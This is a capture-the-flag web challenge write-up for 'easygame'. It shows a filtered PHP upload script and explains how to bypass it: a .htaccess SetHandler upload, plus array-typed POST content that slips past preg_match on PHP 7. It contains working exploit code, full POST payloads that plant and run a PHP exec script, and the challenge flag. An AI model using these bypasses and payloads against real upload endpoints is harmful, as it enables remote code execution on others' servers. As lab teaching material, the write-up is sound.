pcat/7/easygame
Name: easygame
Type: web
Author: kagi
Desc: bypass me
Link: http://139.9.251.90:8888/
Attach: None
Tips: None
Total: 125 First: 佚名 (anonymous) Second: Ricky Third: lu0sf
Writeup
<?php
highlight_file(__FILE__);
#### easy game
$upload = 'upload/'.md5("2021".$_SERVER['REMOTE_ADDR']);
@mkdir($upload);
file_put_contents($upload.'/index.php', '');
var_dump($upload);
if (isset($_POST['file']) && isset($_POST['file'])){
if(preg_match('#.+\.ph(p[3457]?|t|tml)$|/#is',$_POST['file'])){
die('file error');
}
if(preg_match('#\w{2,}|[678]|<\?|/#',$_POST['content'])){
die('content error');
}
file_put_contents($upload.'/'.$_POST['file'], $_POST['content']);
}
if (isset($_GET['reset'])){
@rmdir($upload);
}

Opening the page also runs the script, so below the highlighted source it prints the upload directory for your IP, upload/md5("2021" . REMOTE_ADDR):
string(39) "upload/c946d761bddc7564ff3e45a77a54ae13"
We can write one file into a per-IP upload folder, but both the filename and the content are filtered, so the task is to get past both filters.

Bypass filename
The filename filter (#.+\.ph(p[3457]?|t|tml)$|/#is) rejects anything ending in .php, .php3/.php4/.php5/.php7, .pht or .phtml, case-insensitively, and anything containing a slash, so we cannot upload a PHP file directly or escape the folder. It does not reject .htaccess, though, and a single directive in .htaccess tells Apache to run every file in that folder through the PHP handler, whatever its extension:

.htaccess
SetHandler application/x-httpd-php

After that we can upload a file with any name (no extension at all) and open it, and it is executed as PHP. But how do we get the content of the .htaccess past the content filter? Let's discuss that below.
Bypass content
The content filter (#\w{2,}|[678]|<\?|/#) is strict: any two consecutive word characters, the digits 6, 7 and 8, the opening tag <? and the slash / are all rejected, so neither a PHP script nor the SetHandler directive passes as a plain string. However, the filter only works on strings. If content is sent as an array (content[1]=..., content[2]=..., one character per element), preg_match() on PHP 7 only emits a warning and returns NULL without matching, so the check falls through, while file_put_contents() accepts an array and writes it as implode('', $data). (On PHP 8 preg_match() throws a TypeError on an array subject instead, so the trick depends on the PHP version.) A small helper builds the percent-encoded array parameters; the hex must be zero-padded, otherwise a newline comes out as %a instead of %0a:

def gen_content(inp):
    # One content[i]=%xx parameter per character, 1-indexed, joined with '&'.
    return '&'.join(
        'content[%d]=%%%02x' % (i, ord(c))
        for i, c in enumerate(inp, start=1)
    )

Then we can upload any PHP script to the server and gain RCE.
How do we find the flag? After some searching on the server, we found a /readflag ELF binary that reads the flag file. Executing it from the uploaded script prints the flag.
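To check both bypasses end to end before touching the server, here is an added Python script that is not part of the original writeup. It re-implements the challenge's two preg_match() filters as Python regexes, models the PHP 7 behaviour the bypass relies on (a non-string subject makes preg_match() fail without matching, and file_put_contents() writes an array as implode('', $data)), and builds both POST bodies with one percent-encoded character per array element. The filter patterns, the SetHandler directive and the /readflag path come from the page; the function names, the embedded file contents and the PHP 7/8 note are my assumptions.

```python
import re
from urllib.parse import quote

# Python translations of the two PCRE filters in the challenge source
# (PHP delimiters dropped, the /is flags mapped to re.I | re.S).
FILENAME_FILTER = re.compile(r'.+\.ph(p[3457]?|t|tml)$|/', re.I | re.S)
CONTENT_FILTER = re.compile(r'\w{2,}|[678]|<\?|/')

# The two files the writeup uploads (constructed here): the Apache handler
# override, and a no-extension script that runs the /readflag helper.
HTACCESS = 'SetHandler application/x-httpd-php'
SCRIPT = '<?php\necho exec("/readflag")\n?>'


def filename_rejected(name):
    """Mirror the first preg_match(): True means the server dies with 'file error'."""
    return FILENAME_FILTER.search(name) is not None


def content_rejected(content):
    """Mirror the second preg_match() as PHP 7 behaves (assumption, see lead-in):
    a string is matched; a non-string subject makes preg_match() fail with a
    warning and no match, so the check falls through and the write proceeds.
    PHP 8 would throw a TypeError here instead."""
    if not isinstance(content, str):
        return False
    return CONTENT_FILTER.search(content) is not None


def php_array_join(parts):
    """What file_put_contents() does with an array argument: implode('', $data),
    in the order PHP parsed the content[i] keys from the POST body."""
    return ''.join(parts)


def build_body(filename, content):
    """Build the x-www-form-urlencoded body: the filename as a plain string and
    the content split into content[1]=.., content[2]=.., one percent-encoded
    character each (zero-padded, so a newline is %0a rather than %a)."""
    fields = ['file=' + quote(filename, safe='')]
    for i, ch in enumerate(content, start=1):
        fields.append('content[%d]=%%%02x' % (i, ord(ch)))
    return '&'.join(fields)


def exploit_bodies():
    """Return the two POST bodies in upload order (.htaccess first), after
    checking that each filename passes the filename filter, that the content
    would be rejected as a plain string, and that the array form slips past
    and joins back to the intended file content."""
    uploads = [('.htaccess', HTACCESS), ('payload', SCRIPT)]
    bodies = []
    for name, content in uploads:
        assert not filename_rejected(name), name
        assert content_rejected(content), 'plain string should die'
        assert not content_rejected(list(content)), 'array form should pass'
        assert php_array_join(list(content)) == content
        bodies.append(build_body(name, content))
    return bodies


if __name__ == '__main__':
    for body in exploit_bodies():
        print(body)
        print()
```

Send each printed body as the POST data to the challenge URL in that order, then open upload/<hash>/payload (the hash is the directory the page prints for your IP) to run the script.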
Payload
.htaccess file upload (the content is the single line SetHandler application/x-httpd-php, sent one character per array element):
file=.htaccess&content[1]=S&content[2]=e&content[3]=t&content[4]=H&content[5]=a&content[6]=n&content[7]=d&content[8]=l&content[9]=e&content[10]=r&content[11]=%20&content[12]=a&content[13]=p&content[14]=p&content[15]=l&content[16]=i&content[17]=c&content[18]=a&content[19]=t&content[20]=i&content[21]=o&content[22]=n&content[23]=/&content[24]=x&content[25]=-&content[26]=h&content[27]=t&content[28]=t&content[29]=p&content[30]=d&content[31]=-&content[32]=p&content[33]=h&content[34]=p
payload file upload (the content is <?php echo exec("/readflag") ?> split over three lines; afterwards open upload/<hash>/payload, where <hash> is the directory the page printed for your IP):
file=payload&content[1]=<&content[2]=?&content[3]=p&content[4]=h&content[5]=p&content[6]=%0a&content[7]=e&content[8]=c&content[9]=h&content[10]=o&content[11]=%20&content[12]=e&content[13]=x&content[14]=e&content[15]=c&content[16]=(&content[17]="&content[18]=/&content[19]=r&content[20]=e&content[21]=a&content[22]=d&content[23]=f&content[24]=l&content[25]=a&content[26]=g&content[27]="&content[28]=)&content[29]=%0a&content[30]=?&content[31]=>
Flag
flag{46dd5c50-3e80-485e-80f4-f46b5d85f4b8}